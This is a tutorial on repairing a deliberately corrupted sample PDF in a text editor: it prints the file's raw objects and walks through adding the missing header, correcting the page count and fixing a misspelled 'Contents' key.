Today, I will show you how to analyze and troubelshoot a corrupted or malicious PDF document. In this exercise I will be using sample PDF file for illustration purposes which you can download from here [Reference 2]. Before proceeding further, it is highly recommended that you to read this article 'PDF Overview - Peering into the Internals of PDF' [Reference 1] for better understanding of internal structure and components of PDF.

This article will help you get better understanding of inner working and flow of PDF file assisting you in the PDF Malware Analysis or any research work revolving around PDF.

Requirements

Before we get our hands dirty, we need to have following tools

Acrobat Reader Notepad++ or any other text editor

Starting Corrupted PDF

Now download the sample document 'multipages.pdf' [References 2] and open it in the PDF reader. On launching you will see following error

Tracing and Fixing the Error in PDF

Lets start the investigation as to see what went wrong with this PDF document. To get inside view, open this corrupt PDF file in Notepad++.  You will see the contents as shown below

1 0 obj <<          /Pages 2 0 R         /Type /Catalog >>  endobj 2 0 obj <<          /Count 2         /Kids [ 3 0 R 5 0 R 7 0 R 9 0 R 11 0 R ]         /Type /Pages >>  endobj 3 0 obj <<          /MediaBox [ 0 0 795 842 ]         /Parent 2 0 R         /Contents 4 0 R         /Resources <<                /Font <<                        /F1 <<                                /Name /F1                                /BaseFont /Helvetica                                /Subtype /Type1                                /Type /Font                        >>                >>         >>         /Type /Page >>  endobj 4 0 obj <<          /Length 55 >>stream BT /F1 18 Tf 186 690 Td 20 TL (www.secsavvy.com) Tj ET   endstream endobj 5 0 obj <<          /MediaBox [ 0 0 795 842 ]         /Parent 2 0 R         /Contents 6 0 R         /Resources <<                /Font <<                        /F1 <<                                /Name /F1                                /BaseFont /Helvetica                                /Subtype /Type1                                /Type /Font                        >>                >>         >>         /Type /Page >>  endobj 6 0 obj <<          /Length 45 >>stream BT /F1 15 Tf 186 690 Td 20 TL (Page 1) Tj ET   endstream endobj 7 0 obj <<          /MediaBox [ 0 0 795 842 ]         /Parent 2 0 R         /Contents 8 0 R         /Resources <<                /Font <<                        /F1 <<                                /Name /F1                                /BaseFont /Helvetica                                /Subtype /Type1                                /Type /Font                        >>                >>         >>         /Type /Page >>  endobj 8 0 obj <<          /Length 45 >>stream BT /F1 15 Tf 186 690 Td 20 TL (Page 2) Tj ET   endstream endobj 9 0 obj <<          /MediaBox [ 0 0 795 842 ]         /Parent 2 0 R         /Contents 10 0 R         /Resources <<                /Font <<                        /F1 <<                                /Name /F1                                /BaseFont /Helvetica                                /Subtype /Type1                                /Type /Font                        >>                >>         >>         /Type /Page >>  endobj 10 0 obj <<          /Length 45 >>stream BT /F1 15 Tf 186 690 Td 20 TL (Page 3) Tj ET   endstream endobj 11 0 obj <<          /MediaBox [ 0 0 795 842 ]         /Parent 2 0 R         /Content 12 0 R         /Resources <<                /Font <<                        /F1 <<                                /Name /F1                                /BaseFont /Helvetica                                /Subtype /Type1                                /Type /Font                        >>                >>         >>         /Type /Page >>  endobj 12 0 obj <<          /Length 47 >>stream BT /F1 15 Tf 186 690 Td 20 TL (Password) Tj ET   endstream endobj xref 0 13 0000000000 65535 f 0000000010 00000 n 0000000067 00000 n 0000000161 00000 n 0000000398 00000 n 0000000510 00000 n 0000000747 00000 n 0000000849 00000 n 0000001086 00000 n 0000001188 00000 n 0000001426 00000 n 0000001529 00000 n 0000001768 00000 n trailer <<          /Root 1 0 R         /Size 13 >>  startxref 1873 %%EOF

PDF file consists of 4 elements:

PDF header identifying the PDF specification. A body containing the objects that make up the document contained in the file A cross-reference table containing information about the indirect objects in the file A trailer giving the location of the cross-reference table and of certain special objects within the body of the file.

But here if you observe closely,  there is no header so we will add a PDF header and try to open this PDF.

%PDF-1.7

Lets add this missing header info at the beginning of the file. Now you can open it open it without problem as shown below.

Well that's good, but everything is not right. From the above picture you can see that it has total of 2 pictures. Lets investigate further. Here is the screenshot showing the brief analysis of page-linking structure of this PDF file

Now, we are able to find that this PDF has actually total 5 pages so edit the Count from 2 to 5 and open this PDF as shown below.

%PDF-1.7 1 0 obj << /Pages 2 0 R /Type /Catalog >> endobj 2 0 obj << /Count 5 /Kids [ 3 0 R 5 0 R 7 0 R 9 0 R 11 0 R ] /Type /Pages >> endobj

Now, we are able to see all 5 pages but last page is blank so we will investigate further. Last page is in fact pointed by 11 0 R indirect object reference clear from the code snippet below

11 0 obj << /MediaBox [ 0 0 795 842 ] /Parent 2 0 R /Content 12 0 R /Resources << /Font << /F1 << /Name /F1 /BaseFont /Helvetica /Subtype /Type1 /Type /Font >> >> >> /Type /Page >> endobj

In PDF, 'Contents' keyword is used for describing the contents of a file . If this entry is absent then the page is empty. But here object number 12 Contents is written as 'Content' (note the missing 's' at the end). Hence the PDF reader is unable to recognize the name Content so it ignores the Content without giving any error. To fix this, simply replace Content with Contents and open the PDF. Now you will be able to see all five pages. You can download this fixed PDF 'MultiplePages_Fixed' [Reference 2] and test it for yourself.

Video Demonstration

Here is the video demonstration of this entire analysis and fixing process.

http://vimeo.com/18075125

Reference

PDF Overview - Peering into the Internals of PDF Download Sample PDF File PDF resources on Didier Stevens Blog

Conclusion

IHope you enjoyed this article and also got to know more about working flow of PDF document. f you are more interested to read about PDF then I recommend you to visit excellent bog of Didier Stevens [Reference 3]